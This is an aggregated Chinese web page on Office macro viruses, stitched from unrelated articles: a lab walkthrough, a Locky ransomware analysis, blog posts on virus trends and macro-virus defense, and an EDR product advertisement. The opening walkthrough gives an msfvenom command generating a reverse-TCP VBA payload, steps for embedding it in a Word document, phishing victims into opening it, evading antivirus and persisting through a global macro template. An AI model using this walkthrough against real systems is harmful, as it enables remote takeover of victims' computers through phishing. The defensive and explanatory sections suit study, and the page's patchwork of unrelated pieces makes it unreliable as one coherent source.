宏病毒杀毒软件(黑客是如何通过宏病毒入侵你电脑的?)
宏病毒杀毒软件文章列表:
黑客是如何通过宏病毒入侵你电脑的?
#黑客##网络安全威胁##头条科技#
实验名称:
利用Office宏病毒反弹shell
病毒简介:
宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上,攻击者甚至可以利用在宏代码中写入反弹shell脚本,诱骗受害者打开带有宏病毒的office文档,实现对其主机的远程控制。
实现过程:
1.首先实验攻击者利用本地(172.16.0.55)的Metasploit工具生成payload文件,生成名为jaky.vba的文件.
命令如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.55 LPORT=6666 -f vba -o JAky.vba
2.我们可以先cat一下这个文件,看看这跟文件里面payload的内容。
3.也可以将这个文件放到网站根目录下面,通过网站的方式打开这个文件, 查看生成的payload
4.将vba代码录入宏中,我们可以先新建一个word文档。
5.打开word文档,默认情况下,宏是关闭的,进入信任中心,点击信任中心设置,手动开启一下。
6.开始设置宏内容:宏的名字可以任意命名,点击“创建”出现宏的编辑器。
7.将之前生成的宏病毒payload,复制到新创建的宏里面。
8.将文档保存另存为包含宏的文档类型,这里其实也可以直接保存的。
9.保存后退出,并通过各种方式向受害者发送此钓鱼文档,并引诱其打开。
10.在kali上面设置监听模式等待对方点击文档,然后反弹shell
11.执行监听,然后诱骗点击文档,就可以看到反弹过来的shell了,拿到用户权限。当文档关闭的时候,该工作组会被关闭,所以建议做进程迁移。
12.更加恶劣的是,当这个宏病毒一旦注入到目标主机时,后面不管用户新建或者打开什么word文档,都会被反弹连接上来。
实验拓展:
1.实验过程中,这种简单的shellcode,可能会被杀毒软件报毒。对shellcode部分可以尝试做一下免杀处理。
2.如果创建的是全局宏,Office会在这个目录生成一个dotm文档:
C:Users(username)AppDataRoamingMicrosoftTemplates
注:全局宏是对于当前计算机所有文档对象有效,即文档本身不包含宏代码,也可以运行全局宏。但是本身的全局宏名字是随机生成的,所以要先创建一个全局宏,定义一下名字。打开其他文档时才能调用并执行代码。
这个全局宏中的文件:vbaProject.bin是包含了特征的文件,但是反病毒软件不会扫描这个文件,除非主动查杀。这个特性可以达到维持权限的作用。
Locky病毒分析及防护
2016年3月,绿盟科技安全团队捕获Locky病毒样本,经过分析,此勒索病毒会以邮件的形式进行传播。用户一旦感染该病毒,会自动加密电脑文件。除支付赎金外,目前尚无解密办法。绿盟科技安全专家对该事件相关信息及核心样本进行了分析及验证,并给出应对方案。
Locky病毒危害巨大
操作系统中如果中了勒索病毒的话,就会导致硬盘里的所有文档、图片文件及压缩包等等的文件遭到病毒的高强度加密,如果你想要取回这些文档,目前只有一个办法—-交赎金。受害者需要在制定的时间限制内支付赎金,否则文件将永久无法打开。因为用户文件ZLIB压缩之后还进行了AES加密,如果想暴力破解非常困难,所以很多企业和个人都被迫进行交易,但是很多人即便交付勒索金,也无法导致文件恢复,带来了巨大损失。 现在Locky样本发现勒索提示可以显示中文,新一轮勒索病毒已在中国开始蔓延,故此次勒索事件与以往情况不同,犯罪集团的矛头开始指向中国用户。
Locky病毒过程重现
为了帮助用户能够对此次攻击事件有更深入的了解,绿盟科技安全专家联合威胁响应中心的技术专家,对事件涉及的勒索病毒进行了深入分析。该样本包含多个文件,报告中有绿盟科技的工程师模拟重现这个分析过程。
感染步骤
勒索病毒的感染步骤:
勒索病毒通常以压缩包附件形式隐藏在邮件中,通过各种形式引诱用户打开运行。
运行后,会从网络上下载真实的勒索软件样本。
运行后,会从网络上下载公钥内容写入到注册表中。
用公钥对关键文件进行加密,更改桌面背景,并弹出勒索信息提示框,要求付费解密。
最后会自行删除勒索软件样本,以躲避查杀和分析。
Locky病毒防护办法
基于目前绿盟科技安全专家的分析情况来看,已经启动了一套应对方案,可以帮助客户应对该事件,避免造成更大的风险和损失,这些方案包括:
检测方案:绿盟威胁分析系统TAC
防护方案:新一代威胁防御解决方案NGTP
产品防护:绿盟科技用户升级即可获得防护能力
手工防护:使用手工方法进行防范
加固工具:绿盟极光发布勒索软件加固工具
Locky病毒防护办法
提高安全意识,防患于未然
绿盟科技通过对Locky病毒样本的深入分析和对攻击事件步骤的还原,得知勒索病毒Locky的攻击手法并不新奇,就是通过邮件形式传播,需要被攻击用户主动打开附件内容并点击宏代码执行,由此可见传统的攻击手段并没有失效,Office宏病毒的破坏力依然存在。
硬盘有价,数据无价。现在有许多人都习惯了把重要资料保存在电脑中,方便查看与修改。但是大部分人却忘记了硬盘会坏,电脑会被盗,文档会被误删,系统会被感染病毒……所以,养成定期的文档异地备份的习惯是很重要的,防止数据丢失等意外状况。
随着科技发展,各种盗号木马层出不穷,各种病毒也在不少用户电脑中肆虐着。作为普通用户,还需多加防范,提高个人安全意识才能做到有备无患。
欲知报告的更多内容,请下载:Locky Virus Analysis and Protection Measures
如果您需要了解更多内容,可以
加入QQ群:486207500
为什么现在感觉电脑病毒变少了?
首先确定一下电脑病毒的定义,电脑病毒指编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机正常使用并且能够自我复制的一组计算机指令或程序代码。电脑病毒大致可分为引导型病毒、文件型病毒和混合型病毒3种以及互联网病毒。
再看一下电脑病毒的目的性有哪些,无外乎有以下几种:
1.炫耀。(通常是那些程序员炫耀技术的手段)
2.为了经济利益。(某些病毒就是那些杀毒软件厂商制造出来用于推销自家杀毒软件的伎俩)
3.恶作剧。(和第一条差不多)
4.好玩。(恶趣味)
5.陷害他人。(要看个人目的)
6.为了盗取机密或重要文件。(这个最为重要)
当年流行的熊猫烧香
能攻击电脑硬件的CIH病毒
其实近年来感觉上电脑病毒变少了,其实不然,传统意义上的电脑病毒比如蠕虫病毒,宏病毒之类的的确减少了,那是因为绝大多数杀毒软件都免费,编写病毒程序用于炫耀的程序员大多被杀毒软件公司招安了,那些比较大的黑客团队都热衷于攻击国家和大型公司的网站和数据库,对个人电脑没什么兴趣,近几年引起关注的电脑病毒应该是2017年的勒索病毒,全球一共有150多万台电脑感染。个人电脑碰上传统电脑病毒的概率的确大大降低了,但不代表电脑病毒变少了。
现在对个人电脑威胁最大的是恶意网站,恶意代码和木马。很多网站被内嵌恶意代码,恶意程序的危害有很多种,例如锁定IE首页、计算机无缘无故自动访问某些网站或者出现广告、计算机文件莫名其妙丢失、计算机频繁出错、计算机运行缓慢、有价值的账号丢失或者被消费(例如QQ账号丢失、ADSL被网上消费)等。
还有木马程序,这对个人电脑的威胁更大。其实木马程序也是病毒的一种,但和传统电脑病毒还是有区别的,主要有以下几方面:
1、 病毒会传染,而木马不会传染;
2、 病毒入侵电脑后会有感觉,而木马不会,主要原因是方便其开展后续“工作”;
3、 病毒主要是以“破坏”著称,而木马主要是用来盗取用户信息。
所以说现在电脑病毒并不是变少了,而是换了一种方式继续存在,而且更加隐蔽和常见,所以要尽量做到不明网站不要打开,在正规网站上下载安装软件,安装正版杀毒软件,做好个人电脑必要的防护。
我是o羊羽o哥,一个弱电行业从业者,感谢阅读,喜欢的话还请点个赞,加个关注,谢谢!
Word竟然也会被植入病毒,比熊猫烧香还可怕
猫友们肯定听说过电脑病毒(木马)吧,举个例子。
2007年“熊猫烧香”木马就像快播种子一样席卷全国,你经历过吗?
中了熊猫烧香病毒的桌面
“熊猫烧香病毒能感染你电脑中的exe,com,pif,src,html,asp等文件,它还能终止大量的反病毒软件进程并且会删除扩展名为gho的备份文件。”
这意味着不但你的文件遭到毁坏,而且无法使用windows系统自带的系统还原,只能重装电脑了,真是拿这些无法无天的黑客没办法了。
很多游戏玩家(包括猫君)也被木马盗取过游戏账号,看着花费大量人民币和心血的账号就这么没了,当时我的内心是崩溃的。猫君身边不少同学的QQ号经常被盗掉,然后到处坑蒙拐骗,网络世界,盗号无处不在啊。
很多人都是点了不该点的网站= =
电脑中病毒往往都是因为你下了不干净的东西,或者上了不该上的网站,或者插入被感染的U盘等等。
然而,你可能没想到:黑客利用word竟然也可以轻松控制你的电脑。
最近乌克兰电力公司的高管收到一封带有word病毒的邮件,然后就“中奖”了,这个word文档一旦被打开,里面的“宏”会自动下载致命的木马,然后感染你电脑的文件,窃取你的隐私资料,最终,这次攻击造成乌克兰100多万人口停电的惨剧。
宏病毒是什么:
宏在word和excel是一种集成的编程语言(VBA),可以帮助你更加方便地使用办公软件,比如在 word里面的函数和表格,EXCEL里面的插入的按钮,都是一种宏,而宏病毒就是黑客在宏里面恶意植入的一种病毒。
这种攻击方式从2016年开始正在慢慢针对个人网民,黑客是怎么操作的呢?
1.通过系统工程学,分析你的职业,兴趣爱好,比如你喜欢电影,Ta会给你发送一封”今年奥斯卡最佳男演员竟然是他“的伊妹儿。
2.然后你打开邮件里面的word附件,一旦加载”宏“,就会帮你在黑客的服务器上下载一个叫”locky“的病毒软件。
3.软件会把你的电脑所有文件替换替换为.locky位后缀的文件,而且你会发现,防抗没有任何效果,请乖乖缴械投降。
4.弹出一个通知:请缴纳一定的比特币,否则等着格式化电脑吧。
被勒索时候的弹窗信息
比特币就是一种网络上的虚拟货币,它没有发行方,完全是由一些电脑主机通过”挖矿“的方式获取,数量也比较稀少,曾经最高1100美元一个比特币。比特币的交易也是完全私密的,外人无法辨别用户身份,所以这就是黑客要求用比特币交易的目的。
如果有一天这个locky“宏病毒”来到我们的身边,那真是一场噩梦啊。
举个例子(纯属虚构),
老大:猫君,赶紧把今天的稿子发给我,我已经饥渴难耐了。
猫君:很快,我待会就用word发你,心急吃不了热豆腐哦。
老大:你刚才给我发了什么?为什么我电脑崩溃了。
猫君:卧槽,word竟然也有病毒啦。。。
Locky 勒索软件正以每小时4000个新感染的速度传播,这相当于每天传染十万个新受害者,德国、荷兰、美国的数十万用户已经被敲诈,被迫害的用户估计可以绕地球一圈了。
更可气的是,这个word病毒还会自动检测你的云盘里的文件,然后帮你加密,如果遇到了这个病毒,猫君建议,赶紧检查下云盘是否被感染。
不过幸运的是:目前这个locky病毒还没有在国内发生过,所以天朝的防火墙GFW还是有一定的正面意义的。
如何防止自己电脑被word病毒控制呢?很简单:
1.不要轻易打开陌生邮件中的word,excel文件,即使打开后让你启用”宏“,必须要拒绝哦。
2.你还可以给自己电脑下个杀毒软件,时刻守护你的电脑安全。
3.买个移动硬盘,定期备份重要文件。
PS,office的”宏“漏洞不是一天两天的事情了,经常杀毒软件会报毒,甚至在上个世界90年代,在windows98系统中就有”宏病毒“存在过。
在中国,几乎每台windows系统电脑都预装有office办公软件,假如这种病毒一旦蔓延开来,是不是将会比“熊猫烧香”病毒更可怕?
所有的好奇心都值得被满足
『关注本号的人,总比别人知道的多一点』
更多好看好玩的,欢迎关注微信公众号:好奇猫(haoqimao007)
突破!深信服EDR跃居第三,将全面拥抱SASE
近日,IDC发布了《2020年下半年中国IT安全软件市场跟踪报告》(以下简称报告)。报告显示,在2020年终端安全软件市场份额中,深信服终端检测响应平台(简称深信服EDR)以7.4%的成绩位列第三。
数据来源于IDC
如此快速的增长得益于深信服EDR产品优异的安全效果和强大的产品实力。从产品端来看,深信服EDR的实力主要体现在以下几方面。
聚焦用户,提升产品实力
为实时保障用户的终端业务安全,深信服团队基于10年的技术积累经验,在原有的网络安全应急响应处置工具的基础上,集成了防病毒、EPP、EDR三位一体的终端安全软件,为用户提供「轻量易用,实时保护,东西向可视可控」的全方位防护能力。
1、轻量易用:基于轻代理架构部署,客户端性能消耗少,同时全面兼容各类系统,实现轻量化业务“零干扰”。同时,在管理平台安全策略方面,配置简单,自动构建安全防御,轻松实现半自动化运维,大幅减少了终端安全管理运维的压力。
EDR全面适配各类型资产
2、实时保护:基于威胁攻击链,实现了30余个功能的安全防护,覆盖预防、防护、检测、响应、运营五个阶段,进行多层次全生命周期的立体防护。
预防:通过基线检查、漏洞补丁管理等检测方法,提前识别终端安全脆弱点,预防病毒利用漏洞进行攻击。
防护:提供勒索诱饵防护和无文件攻击专防的防护功能,帮助用户抵御未知威胁的入侵。
检测:基于人工智能SAVE引擎全天候监控,并进行违规外联监控,实时保护终端安全。
响应:通过宏病毒修复、进程溯源、终端隔离等措施,全网围剿式查杀,快速清除威胁。
运营:从运维角度出发,打造全面清晰的可视化终端资产盘点,提高运维工作效率。
EDR部分功能列表
3、东西向可视可控:针对东西向流量看不清、难管控的问题,深信服EDR基于轻代理的创新微隔离方案,精细化的安全策略管控网络访问行为,有效阻止病毒横向传播,大大降低对用户的威胁影响面。
EDR微隔离管控
云化演进,全面拥抱SASE
除产品实力不断升级外,深信服EDR也在向SASE化上进行能力延伸。推出了深信服SASE方案-终端检测响应。
深信服SASE方案-终端检测响应依托云平台的计算能力以及大数据关联分析能力,可快速定位出失陷主机和高级威胁,且具备分析与处置能力强、开通部署方便快捷、实时更新最新版本、微信公众号主动告警、一键处置安全事件、相同模式下不同安全能力支持扩展等特点。
安全能力云化交付可以大幅降低分支机构的大量设备采购成本和运维人力,无需硬件、即开即用,弹性扩容,让安全防护更简单。
深信服SASE方案架构
未来,深信服EDR也将依托终端安全能力平台,针对无文件型的恶意软件、0day漏洞、APT等高级威胁,基于创新型IOA行为检测与响应技术,实现威胁检测 响应闭环处置的端点一站式防护能力。同时加强云化交付能力,让安装部署更高效、终端保护更可靠,持续为企业级用户提供「轻量易用,实时保护,东西向可视可控」的终端安全防护能力。